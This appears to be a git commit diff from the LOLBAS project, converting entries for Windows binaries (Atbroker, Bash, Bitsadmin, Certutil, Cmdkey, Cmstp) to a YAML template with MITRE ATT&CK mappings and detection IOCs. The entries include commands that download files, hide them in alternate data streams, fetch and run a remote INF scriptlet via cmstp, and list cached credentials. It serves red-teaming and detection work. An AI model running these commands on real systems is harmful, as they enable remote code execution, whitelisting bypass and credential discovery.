Update readme, began updating OSBins with new template

This commit is contained in:
Oddvar Moe 2018-09-24 01:50:14 +02:00
parent e8c7042468
commit adafa6de3f
17 changed files with 234 additions and 121 deletions

View File

@ -17,9 +17,10 @@ Primarily files that offer "extra" functionality.
## Definition ## Definition
* Must be a Microsoft signed file. (OS or downloaded from Microsoft site) * Must be a Microsoft signed file. (Native to the OS or downloaded from Microsoft site)
* Only extra "unexpected" functionality is interesting (Not interesting to document what it was intended for) * Only extra "unexpected" functionality is interesting (Not interesting to document what it was intended for)
* Exceptions are Application Whitelisting bypasses * Exceptions are Application Whitelisting bypasses
* Primary focus is stuff that can be leveraged by APT or in Red Teaming
* Functionality can include: * Functionality can include:
* Executing code * Executing code
@ -48,14 +49,15 @@ We generate the MD files from this and later it will also be the base for an upc
## STORY ## STORY
"Living off the land" was coined by Matt Graeber - @mattifestation <3 "Living off the land" was coined by Christopher Campbell (@obscuresec) & Matt Graeber (@mattifestation)
One of the first "Living Off The Land" talks (That I know of) is this one: One of the first "Living Off The Land" talks is this one:
https://www.youtube.com/watch?v=j-r6UonEkUw https://www.youtube.com/watch?v=j-r6UonEkUw
The term LOLBins came from a twitter discussion on what to call these binaries. It was first proposed by Philip Goh - @MathCasualty here: The term LOLBins came from a twitter discussion on what to call these binaries that can be used by an attacker to perform other actions than what the binary was designed to do.
LOLBins was first proposed by Philip Goh (@MathCasualty) here:
https://twitter.com/MathCasualty/status/969174982579273728 https://twitter.com/MathCasualty/status/969174982579273728
The term LOLScripts came from Jimmy - @bohops: The term LOLScripts came from Jimmy (@bohops):
https://twitter.com/bohops/status/984828803120881665 https://twitter.com/bohops/status/984828803120881665
Common hashtags for these files are: Common hashtags for these files are:
@ -71,7 +73,7 @@ A "highly scientific poll" was also conducted to agree (69% yes) on the name LOL
https://twitter.com/Oddvarmoe/status/985432848961343488 https://twitter.com/Oddvarmoe/status/985432848961343488
The domain http://lolbins.com has been registered by an unknown individual and redirected it to this project. (Thank you) The domain http://lolbins.com has been registered by an unknown individual and redirected it to this project. (Thank you)
The domain http://lolbas-project.com has been registered by Jimmy (@bohops). (Thanks!)
The awesome logos in the logo folder was provided by Adam Nadrowski (@_sup_mane) - Thank you so much man! The awesome logos in the logo folder was provided by Adam Nadrowski (@_sup_mane) - Thank you so much man!
Love this logo: Love this logo:
@ -82,33 +84,36 @@ Love this logo:
All features are added to the issues in this repo. All features are added to the issues in this repo.
### 1.0 ### 1.0
* Hosted https://github.com/api0cradle/LOLBAS/ - [x] Hosted https://github.com/api0cradle/LOLBAS/
* Only MD files - [x] Only MD files
### 2.0 -- Current ### 2.0 -- Current
* Hosted here on this repo - [x] Moved from api0cradle and hosted here on this repo (https://github.com/LOLBAS-Project/LOLBAS)
* Everything converted to YML files - [x] Everything converted to YML files
* MD files generated from YML files - [x] MD files generated from YML files
* Clearer definition - [x] Clearer definition of a LOLBin
* Management scripts - [ ] Management scripts
- [x] New template
### 2.1 ### 2.1
* More categories - [ ] Migration to new template
* Jekyll frontend - [ ] More categories - Part of the new template
* Privileges required - [ ] ATT&CK Mitre mapping
- [ ] Privileges required by binary
- [ ] Jekyll frontend
### 2.2 ### 2.2
* ATT&CK Mitre mapping - [ ] LOLBIN GUID - Unique ID for each bin
* LOLBIN GUID - Unique ID for each bin - [ ]Sub-Categories
* Sub-Categories - [ ] Signed executing unsigned
* Signed executing unsigned - [ ] Signed executing signed
* Signed executing signed - [ ] Split commands into command, argument structure, and example. i.e. Command: cmstp.exe; ArgStructure: /ini /s <inf_file>; Example: cmstp.exe /ini /s c:\cmstp\CorpVPN.inf
* Split commands into command, argument structure, and example. i.e. Command: cmstp.exe; ArgStructure: /ini /s <inf_file>; Example: cmstp.exe /ini /s c:\cmstp\CorpVPN.inf
### 2.3 ### 2.3
* Tests for PRs to ensure fields are valid - [ ] Tests for PRs to ensure fields are valid
* Provide the project in DB format (sqlite) - [ ]Provide the project in DB format (sqlite)

View File

@ -1,20 +1,29 @@
--- ---
Name: Atbroker.exe Name: Atbroker.exe
Description: Execute Description: Helper binary for Assistive Technology (AT)
Author: '' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: '2018-05-25'
Categories: []
Commands: Commands:
- Command: ATBroker.exe /start malware - Command: ATBroker.exe /start malware
Description: Start a registered Assistive Technology (AT). Description: Start a registered Assistive Technology (AT).
Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10
Full Path: Full Path:
- C:\Windows\System32\Atbroker.exe - path: C:\Windows\System32\Atbroker.exe
- C:\Windows\SysWOW64\Atbroker.exe - path: C:\Windows\SysWOW64\Atbroker.exe
Code Sample: [] Code Sample:
Detection: [] - Code:
Detection:
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
- IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
Resources: Resources:
- http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ - Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
Notes: > Acknowledgement:
Thanks to Adam - @hexacorn - Person: Adam
Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry. Handle: '@hexacorn'
---

View File

@ -1,17 +1,35 @@
--- ---
Name: Bash.exe Name: Bash.exe
Description: Execute Description: File used by Windows subsystem for Linux
Author: '' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: '2018-05-25'
Categories: []
Commands: Commands:
- Command: bash.exe -c calc.exe - Command: bash.exe -c calc.exe
Description: Execute calc.exe. Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10
- Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10
Full Path: Full Path:
- '?' - path: C:\Windows\System32\bash.exe
Code Sample: [] - path: C:\Windows\SysWOW64\bash.exe
Detection: [] Code Sample:
- Code:
Detection:
- IOC: Child process from bash.exe
Resources: Resources:
- '' - Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
Notes: Thanks to ? Acknowledgement:
- Person: Alex Ionescu
Handle: '@aionescu'
---

View File

@ -1,36 +1,59 @@
--- ---
Name: Bitsadmin.exe Name: bitsadmin.exe
Description: Execute, Download, Copy, Read ADS Description: Used for managing background intelligent transfer
Author: '' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: '2018-05-25'
Categories: []
Commands: Commands:
- Command: | - Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
bitsadmin /create 1 Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.
bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL Category: Alternate data streams
bitsadmin /RESUME 1 Privileges: User
bitsadmin /complete 1 MitreID: T1096
- Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. MitreLink: https://attack.mitre.org/wiki/Technique/T1096
- Command: | OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
bitsadmin /create 1 - Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset - Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
Description: One-liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. Description: Command for copying cmd.exe to another folder
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset Usecase: Copy file
Description: One-Liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. Category: Copy
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
Usecase: Execute binary file specified. Can be used as a defensive evasion.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path: Full Path:
- c:\Windows\System32\bitsadmin.exe - path: C:\Windows\System32\bitsadmin.exe
- c:\Windows\SysWOW64\bitsadmin.exe - path: C:\Windows\SysWOW64\bitsadmin.exe
Code Sample: [] Code Sample:
Detection: [] - Code:
Detection:
- IOC: Child process from bitsadmin.exe
- IOC: bitsadmin creates new files
- IOC: bitsadmin adds data to alternate data stream
Resources: Resources:
- https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
- Slide 53 - Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
- https://www.youtube.com/watch?v=_8xJaaQlpBo - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement:
Notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe - Person: Rob Fuller
Handle: '@mubix'
- Person: Chris Gates
Handle: '@carnal0wnage'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -1,25 +1,56 @@
--- ---
Name: Certutil.exe Name: Certutil.exe
Description: Download, Add ADS, Decode, Encode Description: Windows binary used for handeling certificates
Author: '' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: '2018-05-25'
Categories: []
Commands: Commands:
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Description: Download and save 7zip to disk in the current folder. Description: Download and save 7zip to disk in the current folder.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Description: Download and save a PS1 file to an Alternate Data Stream (ADS). Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
- Command: | Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
certutil -encode inputFileName encodedOutputFileName Category: Alternate data streams
certutil -decode encodedInputFileName decodedOutputFileName Privileges: User
Description: Commands to encode and decode a file using Base64. MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil -encode inputFileName encodedOutputFileName
Description: Command to encode a file using Base64
Usecase: Encode files to evade defensive measures
Category: Encode
Privileges: User
MitreID: T1027
MitreLink: https://attack.mitre.org/wiki/Technique/T1027
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil -decode encodedInputFileName decodedOutputFileName
Description: Command to decode a Base64 encoded file.
Usecase: Decode files to evade defensive measures
Category: Decode
Privileges: User
MitreID: T1140
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path: Full Path:
- c:\windows\system32\certutil.exe - path: C:\Windows\System32\certutil.exe
- c:\windows\sysWOW64\certutil.exe - path: C:\Windows\SysWOW64\certutil.exe
Code Sample: [] Code Sample:
Detection: [] - Code:
Detection:
- IOC: Certutil.exe creating new files on disk
- IOC: Useragent Microsoft-CryptoAPI/10.0
- IOC: Useragent CertUtil URL Agent
Resources: Resources:
- https://twitter.com/Moriarty_Meng/status/984380793383370752 - Link: https://twitter.com/Moriarty_Meng/status/984380793383370752
- https://twitter.com/mattifestation/status/620107926288515072 - Link: https://twitter.com/mattifestation/status/620107926288515072
Notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016 Acknowledgement:
- Person: Matt Graeber
Handle: '@mattifestation'
- Person: Moriarty
Handle: '@moriarty2016'
---

View File

@ -1,18 +1,28 @@
--- ---
Name: Cmdkey.exe Name: Cmdkey.exe
Description: Credentials Description: creates, lists, and deletes stored user names and passwords or credentials.
Author: '' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: '2018-05-25'
Categories: []
Commands: Commands:
- Command: cmdkey /list - Command: cmdkey /list
Description: List cached credentials. Description: List cached credentials
Usecase: Get credential information from host
Category: Credentials
Privileges: User
MitreID: T1078
MitreLink: https://attack.mitre.org/wiki/Technique/T1078
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path: Full Path:
- c:\windows\system32\cmdkey.exe - path: C:\Windows\System32\cmdkey.exe
- c:\windows\sysWOW64\cmdkey.exe - path: C:\Windows\SysWOW64\cmdkey.exe
Code Sample: [] Code Sample:
Detection: [] - Code:
Detection:
- IOC: Usage of this command could be and IOC
Resources: Resources:
- https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
Notes: '' - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
Acknowledgement:
- Person:
Handle:
---

View File

@ -1,26 +1,43 @@
--- ---
Name: Cmstp.exe Name: Cmstp.exe
Description: Execute, UACBypass Description: Installs or removes a Connection Manager service profile.
Author: '' Author: 'Oddvar Moe'
Created: '2018-05-25' Created: '2018-05-25'
Categories: []
Commands: Commands:
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
Category: Execute
Privileges: User
MitreID: T1191
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
Category: AwL bypass
Privileges: User
MitreID: T1191
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path: Full Path:
- C:\Windows\system32\cmstp.exe - path: C:\Windows\System32\cmstp.exe
- C:\Windows\sysWOW64\cmstp.exe - path: C:\Windows\SysWOW64\cmstp.exe
Code Sample: [] Code Sample:
Detection: [] - Code:
Detection:
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use
- IOC: Cmstp.exe communication towards internet and getting files
Resources: Resources:
- https://twitter.com/NickTyrer/status/958450014111633408 - Link: https://twitter.com/NickTyrer/status/958450014111633408
- https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 - Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
- https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e - Link: https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
- https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ - Link: https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
- https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 - Link: https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
(UAC Bypass) - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp
- https://github.com/hfiref0x/UACME Acknowledgement:
Notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer - Person: Oddvar Moe
Handle: '@oddvarmoe'
- Person: Nick Tyrer
Handle: '@NickTyrer'
---